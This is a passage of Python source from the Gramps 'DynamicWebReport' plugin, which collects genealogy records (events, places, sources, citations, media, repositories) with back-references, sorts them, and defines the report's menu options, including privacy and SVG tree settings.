(e.g. 'Family of John Doe and Jane Doe')\n\t\t@param: family -- family object from database\n\t\t\"\"\"\n\t\thusband_handle = family.get_father_handle()\n\t\tspouse_handle = family.get_mother_handle()\n\n\t\thusband = self.database.get_person_from_handle(husband_handle)\n\t\tspouse = self.database.get_person_from_handle(spouse_handle)\n\n\t\tif husband and spouse:\n\t\t\thusband_name = self.get_person_name(husband)\n\t\t\tspouse_name = self.get_person_name(spouse)\n\t\t\ttitle_str = _(\"Family of %(husband)s and %(spouse)s\") % {\n\t\t\t\t\"husband\": husband_name,\n\t\t\t\t\"spouse\": spouse_name}\n\t\telif husband:\n\t\t\thusband_name = self.get_person_name(husband)\n\t\t\t# Only the name of the husband is known\n\t\t\ttitle_str = _(\"Family of %(father)s\") % {\"father\": husband_name}\n\t\telif spouse:\n\t\t\tspouse_name = self.get_person_name(spouse)\n\t\t\t# Only the name of the wife is known\n\t\t\ttitle_str = _(\"Family of %(mother)s\") % {\"mother\": spouse_name}\n\t\telse:\n\t\t\ttitle_str = \"\"\n\n\t\treturn title_str\n\n\n\tdef _add_event(self, event_handle, bkref_class, bkref_handle, event_ref):\n\t\t\"\"\"\n\t\tAdd event_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\t# Check if event reference already added\n\t\trefs = []\n\t\tif (event_handle in self.bkref_dict[Event]):\n\t\t\trefs = [bkref[BKREF_REFOBJ] for bkref in self.bkref_dict[Event][event_handle]]\n\t\t\t# The event reference is already recorded\n\t\t\tif (event_ref in refs): return\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[Event][event_handle].add((bkref_class, bkref_handle, event_ref))\n\t\t# Event reference attributes citations\n\t\tfor attr in event_ref.get_attribute_list():\n\t\t\tfor citation_handle in attr.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, bkref_class, bkref_handle)\n\t\t# Check if the event is already added\n\t\tif (event_handle in self.obj_dict[Event]): return\n\t\t# Add event in the dictionaries of objects\n\t\tevent = self.database.get_event_from_handle(event_handle)\n\t\tif (not event): return\n\t\tevent_name = str(event.get_type())\n\t\tevent_desc = event.get_description()\n\t\t# The event description can be Y on import from GEDCOM. See the\n\t\t# following quote from the GEDCOM spec: \"The occurrence of an event is\n\t\t# asserted by the presence of either a DATE tag and value or a PLACe tag\n\t\t# and value in the event structure. 
When neither the date value nor the\n\t\t# place value are known then a Y(es) value on the parent event tag line\n\t\t# is required to assert that the event happened.\"\"\n\t\tif not (event_desc == \"\" or event_desc is None or event_desc ==\"Y\"):\n\t\t\tevent_name = event_name + \": \" + event_desc\n\t\tself.obj_dict[Event][event_handle] = [event_name, event.gramps_id, len(self.obj_dict[Event])]\n\t\t# Event place\n\t\tplace_handle = event.get_place_handle()\n\t\tif (place_handle):\n\t\t\tself._add_place(place_handle, bkref_class, bkref_handle)\n\t\t# Event citations\n\t\tfor citation_handle in event.get_citation_list():\n\t\t\tself._add_citation(citation_handle, bkref_class, bkref_handle)\n\t\t# Event attributes citations\n\t\tfor attr in event.get_attribute_list():\n\t\t\tfor citation_handle in attr.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, bkref_class, bkref_handle)\n\t\t# Event media\n\t\tfor media_ref in event.get_media_list():\n\t\t\tmedia_handle = media_ref.get_reference_handle()\n\t\t\tself._add_media(media_handle, bkref_class, bkref_handle, media_ref)\n\n\n\tdef _add_place(self, place_handle, bkref_class, bkref_handle):\n\t\t\"\"\"\n\t\tAdd place_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[Place][place_handle].add((bkref_class, bkref_handle, None))\n\t\t# Check if the place is already added\n\t\tif (place_handle in self.obj_dict[Place]): return\n\t\t# Add place in the dictionaries of objects\n\t\tplace = self.database.get_place_from_handle(place_handle)\n\t\tif (DWR_VERSION_412):\n\t\t\tplace_name = _pd.display(self.database, place)\n\t\telse:\n\t\t\tplace_name = place.get_title()\n\t\tself.obj_dict[Place][place_handle] = [place_name, place.gramps_id, len(self.obj_dict[Place])]\n\n\t\tif (self.inc_places):\n\t\t\t# Place citations\n\t\t\tfor citation_handle in place.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Place, place_handle)\n\t\t\t# Place media\n\t\t\tfor media_ref in place.get_media_list():\n\t\t\t\tmedia_handle = media_ref.get_reference_handle()\n\t\t\t\tself._add_media(media_handle, Place, place_handle, media_ref)\n\n\n\tdef _add_source(self, source_handle, bkref_class, bkref_handle):\n\t\t\"\"\"\n\t\tAdd source_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\tif (not self.inc_sources): return\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[Source][source_handle].add((bkref_class, bkref_handle, None))\n\t\t# Check if the source is already added\n\t\tif (source_handle in self.obj_dict[Source]): return\n\t\t# Add source in the dictionaries of objects\n\t\tsource = self.database.get_source_from_handle(source_handle)\n\t\tsource_name = source.get_title()\n\t\tself.obj_dict[Source][source_handle] = [source_name, source.gramps_id, len(self.obj_dict[Source])]\n\t\t# Source repository\n\t\tif self.inc_repositories:\n\t\t\tfor repo_ref in source.get_reporef_list():\n\t\t\t\trepo_handle = repo_ref.get_reference_handle()\n\t\t\t\tself._add_repository(repo_handle, Source, source_handle, repo_ref)\n\t\t# Source media\n\t\tfor media_ref in source.get_media_list():\n\t\t\tmedia_handle = media_ref.get_reference_handle()\n\t\t\tself._add_media(media_handle, Source, source_handle, media_ref)\n\n\n\tdef _add_citation(self, citation_handle, bkref_class, bkref_handle):\n\t\t\"\"\"\n\t\tAdd citation_handle to the L{self.obj_dict}, and recursively all referenced 
objects\n\t\t\"\"\"\n\t\tif (not self.inc_sources): return\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[Citation][citation_handle].add((bkref_class, bkref_handle, None))\n\t\t# Check if the citation is already added\n\t\tif (citation_handle in self.obj_dict[Citation]): return\n\t\t# Add citation in the dictionaries of objects\n\t\tcitation = self.database.get_citation_from_handle(citation_handle)\n\t\tcitation_name = citation.get_page() or \"\"\n\t\tsource_handle = citation.get_reference_handle()\n\t\tself.obj_dict[Citation][citation_handle] = [citation_name, citation.gramps_id, len(self.obj_dict[Citation])]\n\t\t# Citation source\n\t\tself._add_source(source_handle, Citation, citation_handle)\n\t\t# Citation media (the citation, not its source, is the referrer)\n\t\tfor media_ref in citation.get_media_list():\n\t\t\tmedia_handle = media_ref.get_reference_handle()\n\t\t\tself._add_media(media_handle, Citation, citation_handle, media_ref)\n\n\n\tdef _add_media(self, media_handle, bkref_class, bkref_handle, media_ref):\n\t\t\"\"\"\n\t\tAdd media_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\tif (not self.inc_gallery): return\n\t\t# Check if media reference already added\n\t\trefs = []\n\t\tif (media_handle in self.bkref_dict[MediaObject]):\n\t\t\trefs = [bkref[BKREF_REFOBJ] for bkref in self.bkref_dict[MediaObject][media_handle]]\n\t\t\t# The media reference is already recorded\n\t\t\tif (media_ref in refs): return\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[MediaObject][media_handle].add((bkref_class, bkref_handle, media_ref))\n\t\t# Citations for media reference, media reference attributes\n\t\tcitation_list = media_ref.get_citation_list()\n\t\tfor attr in media_ref.get_attribute_list():\n\t\t\tcitation_list.extend(attr.get_citation_list())\n\t\tfor citation_handle in citation_list:\n\t\t\tself._add_citation(citation_handle, MediaObject, media_handle)\n\t\t# Check if the media is already added\n\t\tif (media_handle in self.obj_dict[MediaObject]): return\n\t\t# Add media in the dictionaries of objects\n\t\tmedia = self.database.get_object_from_handle(media_handle)\n\t\tmedia_name = \"Media\"\n\t\tself.obj_dict[MediaObject][media_handle] = [media_name, media.gramps_id, len(self.obj_dict[MediaObject])]\n\t\t# Citations for media, media attributes\n\t\tcitation_list = media.get_citation_list()\n\t\tfor attr in media.get_attribute_list():\n\t\t\tcitation_list.extend(attr.get_citation_list())\n\t\tfor citation_handle in citation_list:\n\t\t\tself._add_citation(citation_handle, MediaObject, media_handle)\n\n\n\tdef _add_repository(self, repo_handle, bkref_class, bkref_handle, repo_ref):\n\t\t\"\"\"\n\t\tAdd repo_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\tif (not self.inc_repositories): return\n\t\t# Check if repository reference already added\n\t\trefs = []\n\t\tif (repo_handle in self.bkref_dict[Repository]):\n\t\t\trefs = [bkref[BKREF_REFOBJ] for bkref in self.bkref_dict[Repository][repo_handle]]\n\t\t\t# The repository reference is already recorded\n\t\t\tif (repo_ref in refs): return\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[Repository][repo_handle].add((bkref_class, bkref_handle, repo_ref))\n\t\t# Check if the repository is already added\n\t\tif (repo_handle in self.obj_dict[Repository]): return\n\t\t# Add repository in the dictionaries of objects\n\t\trepo = self.database.get_repository_from_handle(repo_handle)\n\t\trepo_name = 
repo.name\n\t\tself.obj_dict[Repository][repo_handle] = [repo_name, repo.gramps_id, len(self.obj_dict[Repository])]\n\t\t# Addresses citations\n\t\tfor addr in repo.get_address_list():\n\t\t\tfor citation_handle in addr.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Repository, repo_handle)\n\n\t\t\t\t\n\t##############################################################################################\n\t##############################################################################################\n\t#\n\t# Objects dictionaries sorting\n\t#\n\t##############################################################################################\n\t##############################################################################################\n\n\n\tdef _sort_obj_dict(self):\n\t\t\"\"\"\n\t\tSort the dictionaries of objects to be included in the reports.\n\t\tThe dictionaries are sorted by name.\n\t\tThe sorting is performed by modifying the index of the objects.\n\t\t\"\"\"\n\t\t\n\t\t# Sort persons\n\t\tsortkeys = {}\n\t\tobjs = list(self.obj_dict[Person].keys())\n\t\tfor handle in objs:\n\t\t\tsortkeys[handle] = self.get_person_name_sort_key(handle)\n\t\tobjs.sort(key = lambda x: sortkeys[x])\n\t\tfor (i, x) in enumerate(objs):\n\t\t\tself.obj_dict[Person][x][OBJDICT_INDEX] = i\n\t\t\t\n\t\t# Sort families\n\t\tsortkeys = {}\n\t\tobjs = list(self.obj_dict[Family].keys())\n\t\tfor handle in objs:\n\t\t\tsortkeys[handle] = self.get_family_name_sort_key(handle)\n\t\tobjs.sort(key = lambda x: sortkeys[x])\n\t\tfor (i, x) in enumerate(objs):\n\t\t\tself.obj_dict[Family][x][OBJDICT_INDEX] = i\n\n\t\t# Sort others\n\t\tfor cls in (Source, Repository, MediaObject, Place):\n\t\t\tobjs = list(self.obj_dict[cls].keys())\n\t\t\tsortkeys = {}\n\t\t\tfor handle in objs:\n\t\t\t\tsortkeys[handle] = SORT_KEY(self.obj_dict[cls][handle][OBJDICT_NAME])\n\t\t\tobjs.sort(key = lambda x: sortkeys[x])\n\t\t\tfor (i, x) in enumerate(objs):\n\t\t\t\tself.obj_dict[cls][x][OBJDICT_INDEX] = i\n\t\t\n\n\tdef get_person_name_sort_key(self, handle):\n\t\t\"\"\"\n\t\tReturn a sort key for a person\n\t\t\"\"\"\n\t\tperson = self.database.get_person_from_handle(handle)\n\t\tprimary_name = person.get_primary_name()\n\t\tsort_str = _nd.sort_string(primary_name)\n\t\treturn(SORT_KEY(sort_str))\n\t\t\n\t\t\n\tdef get_family_name_sort_key(self, handle):\n\t\t\"\"\"\n\t\tReturn a sort key for a family\n\t\t\"\"\"\n\t\tfamily = self.database.get_family_from_handle(handle)\n\t\thusband_handle = family.get_father_handle()\n\t\tspouse_handle = family.get_mother_handle()\n\n\t\thusband = self.database.get_person_from_handle(husband_handle)\n\t\tspouse = self.database.get_person_from_handle(spouse_handle)\n\n\t\tif husband and spouse:\n\t\t\tsort_key = self.get_person_name_sort_key(husband_handle) + SORT_KEY(\" \") + self.get_person_name_sort_key(spouse_handle)\n\t\telif husband:\n\t\t\tsort_key = self.get_person_name_sort_key(husband_handle)\n\t\telif spouse:\n\t\t\tsort_key = self.get_person_name_sort_key(spouse_handle)\n\t\telse:\n\t\t\tsort_key = SORT_KEY(\"\")\n\n\t\treturn(sort_key)\n\t\t\n\t\t\n\t\t\n\t\t\n##################################################################################################\n##################################################################################################\n#\n# DynamicWebReport Menu 
Options\n#\n##################################################################################################\n##################################################################################################\n\nclass DynamicWebOptions(MenuReportOptions):\n\t\"\"\"\n\tCreates the DynamicWebReport Menu Options\n\tDefines options and provides handling interface.\n\t\n\tMethods:\n\t- add_menu_options: called by Gramps to generate the options menu. It calls all the other methods \"__add_***_options\"\n\t- __add_***_options: One method for each tab of the options menu.\n\t- __***_changed: methods called when an option impacts other options\n\t\"\"\"\n\tdef __init__(self, name, dbase):\n\t\n\t\tself.__db = dbase #: Gramps database\n\t\t\n\t\t# The data below are used when some options change the behavior of other options. For example: a boolean option enables/disables another option. These data are used in the methods \"__***_changed\".\n\t\tself.__pid = None\n\t\tself.__filter = None\n\t\tself.__living = None\n\t\tself.__yearsafterdeath = None\n\t\t\n\t\t#: This help explains how Gramps note are modified in order to generate custom pages\n\t\tself.note_help = _(\n\t\t\t\"In this note, the following special words are processed:\\n\"\n\t\t\t\"__SEARCH_FORM__ is replaced by a search form.\\n\"\n\t\t\t\"__NB_INDIVIDUALS__ is replaced by the number of persons.\\n\"\n\t\t\t\"__NB_FAMILIES__ is replaced by the number of families.\\n\"\n\t\t\t\"__NB_MEDIA__ is replaced by the number of media objects.\\n\"\n\t\t\t\"__NB_SOURCES__ is replaced by the number of sources.\\n\"\n\t\t\t\"__NB_REPOSITORIES__ is replaced by the number of repositories.\\n\"\n\t\t\t\"__NB_PLACES__ is replaced by the number of places.\\n\"\n\t\t\t\"__MEDIA___ is replaced by the media with gramps ID .\\n\"\n\t\t\t\"__THUMB___ is replaced by the thumbnail of the media with gramps ID .\\n\"\n\t\t\t\"__EXPORT_DATE__ is replaced by the current date.\\n\"\n\t\t\t\"__GRAMPS_VERSION__ is replaced by the GRAMPS version.\\n\"\n\t\t\t\"__GRAMPS_HOMEPAGE__ is replaced by the GRAMPS homepage link.\\n\"\n\t\t\t\"URL starting with \\\"relative://relative.\\\" are replaced by the relative URL \\\"\\\".\\n\")\n\t\t\t\n\t\tMenuReportOptions.__init__(self, name, dbase)\n\n\t\t\n\tdef add_menu_options(self, menu):\n\t\t\"\"\"\n\t\tAdd options to the menu for the web site.\n\t\t\n\t\tIt calls all the other methods \"__add_***_options\" (one method for each tab of the options menu).\n\t\t\"\"\"\n\t\tself.__add_report_options(menu)\n\t\tself.__add_privacy_options(menu)\n\t\tself.__add_options_options(menu)\n\t\tself.__add_pages_advanced_options(menu)\n\t\tself.__add_pages_options(menu)\n\t\tself.__add_trees_options(menu)\n\t\tself.__add_custom_pages_options(menu)\n\t\tself.__add_select_pages_options(menu)\n\n\t\t\n\tdef __add_report_options(self, menu):\n\t\t\"\"\"\n\t\tOptions on the \"Report\" tab.\n\t\t\"\"\"\n\t\tcategory_name = _(\"Report\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\tdbname = self.__db.get_dbname()\n\t\tdefault_dir = dbname + \"_\" + \"dynamicweb\"\n\t\ttarget = DestinationOption(_(\"Destination\"),\n\t\t\tos.path.join(config.get(\"paths.website-directory\"), default_dir))\n\t\ttarget.set_help(_(\"The destination directory for the web files\"))\n\t\ttarget.set_directory_entry(True)\n\t\taddopt(\"target\", target)\n\n\t\tself.__archive = BooleanOption(_('Store web pages in archive'), False)\n\t\tself.__archive.set_help(_(\"Whether to create an archive file (in ZIP or TGZ format) containing the web 
site\"))\n\t\taddopt(\"archive\", self.__archive)\n\t\tself.__archive.connect(\"value-changed\", self.__archive_changed)\n\n\t\tself.__archive_file = DestinationOption(_(\"Archive file\"),\n\t\t\tos.path.join(config.get(\"paths.website-directory\"), default_dir, \"archive.zip\"))\n\t\tself.__archive_file.set_help(_(\"The archive file name (with \\\".zip\\\" or \\\".tgz\\\" extension)\"))\n\t\tself.__archive_file.set_directory_entry(False)\n\t\taddopt(\"archive_file\", self.__archive_file)\n\n\t\tself.__archive_changed()\n\n\t\ttitle = StringOption(_(\"Web site title\"), _(\"My Family Tree\"))\n\t\ttitle.set_help(_(\"The title of the web site\"))\n\t\taddopt(\"title\", title)\n\n\t\tself.__filter = FilterOption(_(\"Filter\"), 0)\n\t\tself.__filter.set_help(\n\t\t\t _(\"Select filter to restrict people that appear on web site\"))\n\t\taddopt(\"filter\", self.__filter)\n\t\tself.__filter.connect(\"value-changed\", self.__filter_changed)\n\n\t\tself.__pid = PersonOption(_(\"Filter Person\"))\n\t\tself.__pid.set_help(_(\"The center person for the filter\"))\n\t\taddopt(\"pid\", self.__pid)\n\t\tself.__pid.connect(\"value-changed\", self.__pid_changed)\n\n\t\tself.__pid_changed()\n\n\t\t# We must figure out the value of the first option before we can create the EnumeratedListOption\n\t\tfmt_list = _nd.get_name_format()\n\t\tdefaultnum = _nd.get_default_format()\n\t\tdefault = 0\n\t\tfor ind, val in enumerate(fmt_list):\n\t\t\tif val[0] == defaultnum:\n\t\t\t\tdefault = ind\n\t\t\t\tbreak\n\t\tname_format = EnumeratedListOption(_(\"Name format\"), fmt_list[default][0])\n\t\tfor num, name, fmt_str, act in fmt_list:\n\t\t\tname_format.add_item(num, name)\n\t\tname_format.set_help(_(\"Select the format to display the complete names\"))\n\t\taddopt(\"name_format\", name_format)\n\t\tshort_name_format = EnumeratedListOption(_(\"Name format (short)\"), fmt_list[default][0])\n\t\tfor num, name, fmt_str, act in fmt_list:\n\t\t\tshort_name_format.add_item(num, name)\n\t\tshort_name_format.set_help(_(\"Select the format to display a shorter version of the names\"))\n\t\taddopt(\"short_name_format\", short_name_format)\n\t\t\n\t\ttemplate = EnumeratedListOption(_(\"Web site template\"), 0)\n\t\tfor (i, (directory, name)) in enumerate(WEB_TEMPLATE_LIST):\n\t\t\ttemplate.add_item(i, name)\n\t\ttemplate.set_help(_(\"Select the template of the web site\"))\n\t\taddopt(\"template\", template)\n\n\t\tcpright = EnumeratedListOption(_(\"Copyright\"), 0)\n\t\tfor index, copt in enumerate(_COPY_OPTIONS):\n\t\t\tcpright.add_item(index, copt)\n\t\tcpright.set_help( _(\"The copyright to be used for the web files\"))\n\t\taddopt(\"copyright\", cpright)\n\n\n\tdef __add_privacy_options(self, menu):\n\t\t\"\"\"\n\t\tOptions on the \"Privacy\" tab.\n\t\t\"\"\"\n\t\tcategory_name = _(\"Privacy\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\tincpriv = BooleanOption(_(\"Include records marked private\"), False)\n\t\tincpriv.set_help(_(\"Whether to include private objects\"))\n\t\taddopt(\"incpriv\", incpriv)\n\n\t\tinc_notes = BooleanOption(_(\"Export notes\"), True)\n\t\tinc_notes.set_help(_(\"Whether to export notes in the web pages\"))\n\t\taddopt(\"inc_notes\", inc_notes)\n\n\t\tinc_sources = BooleanOption(_(\"Export sources\"), True)\n\t\tinc_sources.set_help(_(\"Whether to export sources and citations in the web pages\"))\n\t\taddopt(\"inc_sources\", inc_sources)\n\n\t\tinc_addresses = BooleanOption(_(\"Export addresses\"), True)\n\t\tinc_addresses.set_help(_(\"Whether to export addresses in the web 
pages\"))\n\t\taddopt(\"inc_addresses\", inc_addresses)\n\n\t\tself.__living = EnumeratedListOption(_(\"Living People\"),\n\t\t\t\t\t\t\t\t\t\t\t LivingProxyDb.MODE_EXCLUDE_ALL)\n\t\tself.__living.add_item(LivingProxyDb.MODE_EXCLUDE_ALL,\n\t\t\t\t\t\t\t _(\"Exclude\"))\n\t\tself.__living.add_item(LivingProxyDb.MODE_INCLUDE_LAST_NAME_ONLY,\n\t\t\t\t\t\t\t _(\"Include Last Name Only\"))\n\t\tself.__living.add_item(LivingProxyDb.MODE_INCLUDE_FULL_NAME_ONLY,\n\t\t\t\t\t\t\t _(\"Include Full Name Only\"))\n\t\tself.__living.add_item(INCLUDE_LIVING_VALUE,\n\t\t\t\t\t\t\t _(\"Include\"))\n\t\tself.__living.set_help(_(\"How to handle living people\"))\n\t\taddopt(\"living\", self.__living)\n\t\tself.__living.connect(\"value-changed\", self.__living_changed)\n\n\t\tself.__yearsafterdeath = NumberOption(_(\"Years from death to consider \"\n\t\t\t\t\t\t\t\t\t\t\t\t \"living\"), 30, 0, 100)\n\t\tself.__yearsafterdeath.set_help(_(\"This allows you to restrict \"\n\t\t\t\t\t\t\t\t\t\t \"information on people who have not \"\n\t\t\t\t\t\t\t\t\t\t \"been dead for very long\"))\n\n\t\taddopt(\"yearsafterdeath\", self.__yearsafterdeath)\n\n\t\tself.__living_changed()\n\n\n\tdef __add_options_options(self, menu):\n\t\tcategory_name = _(\"Options\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\tinc_repositories = BooleanOption(_('Include repository pages'), False)\n\t\tinc_repositories.set_help(_('Whether or not to include the Repository Pages.'))\n\t\taddopt(\"inc_repositories\", inc_repositories)\n\n\t\tinc_gallery = BooleanOption(_(\"Include images and media objects\"), True)\n\t\tinc_gallery.set_help(_(\"Whether to include a media objects in the web pages\"))\n\t\taddopt(\"inc_gallery\", inc_gallery)\n\n\t\tcopy_media = BooleanOption(_(\"Copy images and media objects\"), True)\n\t\tcopy_media.set_help(_(\"Whether to make a copy of the media objects.\"\n\t\t\t\" When the objects are not copied, they are referenced by their relative path name\"))\n\t\taddopt(\"copy_media\", copy_media)\n\n\t\tprint_notes_type = BooleanOption(_(\"Print the notes type\"), True)\n\t\tprint_notes_type.set_help(_(\"Whether to print the notes type in the notes text\"))\n\t\taddopt(\"print_notes_type\", print_notes_type)\n\n\t\tself.__inc_places = BooleanOption(_(\"Print place pages\"), True)\n\t\tself.__inc_places.set_help(_(\"Whether to show pages for the places\"))\n\t\taddopt(\"inc_places\", self.__inc_places)\n\t\tself.__inc_places.connect(\"value-changed\", self.__placemap_options_changed)\n\n\t\tself.__placemappages = BooleanOption(_(\"Include Place map on Place Pages\"), False)\n\t\tself.__placemappages.set_help(_(\n\t\t\t\"Whether to include a place map on the Place Pages, \"\n\t\t\t\"where Latitude/ Longitude are available.\"))\n\t\tself.__placemappages.connect(\"value-changed\", self.__placemap_options_changed)\n\t\taddopt(\"placemappages\", self.__placemappages)\n\n\t\tself.__familymappages = BooleanOption(_(\n\t\t\t\"Include Family Map Pages with \"\n\t\t\t\"all places shown on the map\"), False)\n\t\tself.__familymappages.set_help(_(\n\t\t\t\"Whether or not to add an individual page map \"\n\t\t\t\"showing all the places on this page. 
\"\n\t\t\t\"This will allow you to see how your family \"\n\t\t\t\"traveled around the country.\"))\n\t\tself.__familymappages.connect(\"value-changed\", self.__placemap_options_changed)\n\t\taddopt(\"familymappages\", self.__familymappages)\n\n\t\tmapopts = [\n\t\t\t[_(\"Google\"), \"Google\"],\n\t\t\t[_(\"OpenStreetMap\"), \"OpenStreetMap\"]\n\t\t]\n\t\tself.__mapservice = EnumeratedListOption(_(\"Map Service\"), mapopts[0][1])\n\t\tfor trans, opt in mapopts:\n\t\t\tself.__mapservice.add_item(opt, trans)\n\t\tself.__mapservice.set_help(_(\"Choose your choice of map service for creating the Place Map Pages\"))\n\t\tself.__mapservice.connect(\"value-changed\", self.__placemap_options_changed)\n\t\taddopt(\"mapservice\", self.__mapservice)\n\n\t\tself.__placemap_options_changed()\n\n\n\tdef __add_pages_advanced_options(self, menu):\n\t\tcategory_name = _(\"Advanced\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\tencoding = EnumeratedListOption(_('Character set encoding'), _CHARACTER_SETS[0][1])\n\t\tfor eopt in _CHARACTER_SETS:\n\t\t\tencoding.add_item(eopt[1], eopt[0])\n\t\tencoding.set_help(_(\"The encoding to be used for the web files\"))\n\t\taddopt(\"encoding\", encoding)\n\n\t\tinc_families = BooleanOption(_(\"Include family pages\"), False)\n\t\tinc_families.set_help(_(\"Whether or not to include family pages\"))\n\t\taddopt(\"inc_families\", inc_families)\n\n\t\tinc_events = BooleanOption(_('Include event pages'), False)\n\t\tinc_events.set_help(_('Add a complete events list and relevant pages or not'))\n\t\taddopt(\"inc_events\", inc_events)\n\t\tinc_events.set_available(False)\n\n\t\tshowbirth = BooleanOption(_(\"Include a column for birth dates on the index pages\"), True)\n\t\tshowbirth.set_help(_('Whether to include a birth column'))\n\t\taddopt(\"showbirth\", showbirth)\n\n\t\tshowdeath = BooleanOption(_(\"Include a column for death dates on the index pages\"), False)\n\t\tshowdeath.set_help(_('Whether to include a death column'))\n\t\taddopt(\"showdeath\", showdeath)\n\n\t\tshowmarriage = BooleanOption(_(\"Include a column for marriage dates on the index pages\"), False)\n\t\tshowmarriage.set_help(_('Whether to include a marriage column'))\n\t\taddopt(\"showmarriage\", showmarriage)\n\n\t\tshowpartner = BooleanOption(_(\"Include a column for partners on the index pages\"), False)\n\t\tshowpartner.set_help(_('Whether to include a partners column'))\n\t\taddopt(\"showpartner\", showpartner)\n\n\t\tshowparents = BooleanOption(_(\"Include a column for parents on the index pages\"), False)\n\t\tshowparents.set_help(_('Whether to include a parents column'))\n\t\taddopt(\"showparents\", showparents)\n\n\t\tshowallsiblings = BooleanOption(_(\"Include half and/ or step-siblings on the individual pages\"), False)\n\t\tshowallsiblings.set_help(_( \"Whether to include half and/ or step-siblings with the parents and siblings\"))\n\t\taddopt('showallsiblings', showallsiblings)\n\n\t\tbirthorder = BooleanOption(_('Sort all children in birth order'), False)\n\t\tbirthorder.set_help(_('Whether to display children in birth order or in entry order?'))\n\t\taddopt(\"birthorder\", birthorder)\n\n\t\tbkref_type = BooleanOption(_('Include references in indexes'), False)\n\t\tbkref_type.set_help(_('Whether to include the references to the items in the index pages. 
For example, in the media index page, the names of the individuals, families, places, sources that reference the media.'))\n\t\taddopt(\"bkref_type\", bkref_type)\n\n\t\tinc_gendex = BooleanOption(_('Include GENDEX file (/gendex.txt)'), False)\n\t\tinc_gendex.set_help(_('Whether to include a GENDEX file or not'))\n\t\taddopt(\"inc_gendex\", inc_gendex)\n\n\n\tdef __add_trees_options(self, menu):\n\t\tcategory_name = _(\"Trees\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\tpage_defs = [\n\t\t\tPAGE_SVG_TREE,\n\t\t]\n\t\tfor page_def in page_defs:\n\t\t\tname = PAGES_NAMES[page_def][0]\n\t\t\ttitle = PAGES_NAMES[page_def][1]\n\t\t\tpage_name = StringOption(_(\"Title for the tree \\\"%(name)s\\\"\") % {\"name\": name}, title)\n\t\t\tpage_name.set_help(_(\"Name for the page that shows the tree \\\"%(name)s\\\"\") % {\"name\": name})\n\t\t\taddopt(\"page_name_%i\" % page_def, page_name)\n\n\t\tgraphgens = NumberOption(_(\"Maximum number of generations\"), 10, 3, 30)\n\t\tgraphgens.set_help(_(\"The maximum number of generations to include in the ancestor and descendant trees and graphs\"))\n\t\taddopt(\"graphgens\", graphgens)\n\n\t\tsvg_tree_type = EnumeratedListOption(_(\"SVG tree graph type\"), str(DEFAULT_SVG_TREE_TYPE))\n\t\tfor (i, opt) in enumerate(SVG_TREE_TYPES):\n\t\t\tsvg_tree_type.add_item(str(i), opt)\n\t\tsvg_tree_type.set_help(_(\"Choose the default SVG tree graph type\"))\n\t\taddopt(\"svg_tree_type\", svg_tree_type)\n\t\t\n\t\tsvg_tree_shape = EnumeratedListOption(_(\"SVG tree graph shape\"), str(DEFAULT_SVG_TREE_SHAPE))\n\t\tfor (i, opt) in enumerate(SVG_TREE_SHAPES):\n\t\t\tsvg_tree_shape.add_item(str(i), opt)\n\t\tsvg_tree_shape.set_help(_(\"Choose the default SVG tree graph shape\"))\n\t\taddopt(\"svg_tree_shape\", svg_tree_shape)\n\t\t\n\t\tsvg_tree_distrib_asc = EnumeratedListOption(_(\"SVG tree parents distribution\"), str(DEFAULT_SVG_TREE_DISTRIB))\n\t\tfor (i, opt) in enumerate(SVG_TREE_DISTRIB_ASC):\n\t\t\tsvg_tree_distrib_asc.add_item(str(i), opt)\n\t\tsvg_tree_distrib_asc.set_help(_(\"Choose the default SVG tree parents distribution (for fan charts only)\"))\n\t\taddopt(\"svg_tree_distrib_asc\", svg_tree_distrib_asc)\n\t\t\n\t\tsvg_tree_distrib_dsc = EnumeratedListOption(_(\"SVG tree children distribution\"), str(DEFAULT_SVG_TREE_DISTRIB))\n\t\tfor (i, opt) in enumerate(SVG_TREE_DISTRIB_DSC):\n\t\t\tsvg_tree_distrib_dsc.add_item(str(i), opt)\n\t\tsvg_tree_distrib_dsc.set_help(_(\"Choose the default SVG tree children distribution (for fan charts only)\"))\n\t\taddopt(\"svg_tree_distrib_dsc\", svg_tree_distrib_dsc)\n\t\t\n\t\tsvg_tree_background = EnumeratedListOption(_(\"Background\"), str(DEFAULT_SVG_TREE_BACKGROUND))\n\t\tfor (i, opt) in enumerate(SVG_TREE_BACKGROUNDS):\n\t\t\tsvg_tree_background.add_item(str(i), opt)\n\t\tsvg_tree_background.set_help(_(\"Choose the background color scheme for the persons in the SVG tree graph\"))\n\t\taddopt(\"svg_tree_background\", svg_tree_background)\n\n\t\tsvg_tree_color1 = ColorOption(_(\"Start gradient/Main color\"), \"#EF2929\")\n\t\taddopt(\"svg_tree_color1\", svg_tree_color1)\n\n\t\tsvg_tree_color2 = ColorOption(_(\"End gradient/2nd color\"), \"#3D37E9\")\n\t\taddopt(\"svg_tree_color2\", svg_tree_color2)\n\n\t\tself.__svg_tree_dup = BooleanOption(_(\"Show duplicates\"), True)\n\t\tself.__svg_tree_dup.set_help(_(\"Whether to use a special color for the persons that appear several times in the SVG tree\"))\n\t\tself.__svg_tree_dup.connect(\"value-changed\", 
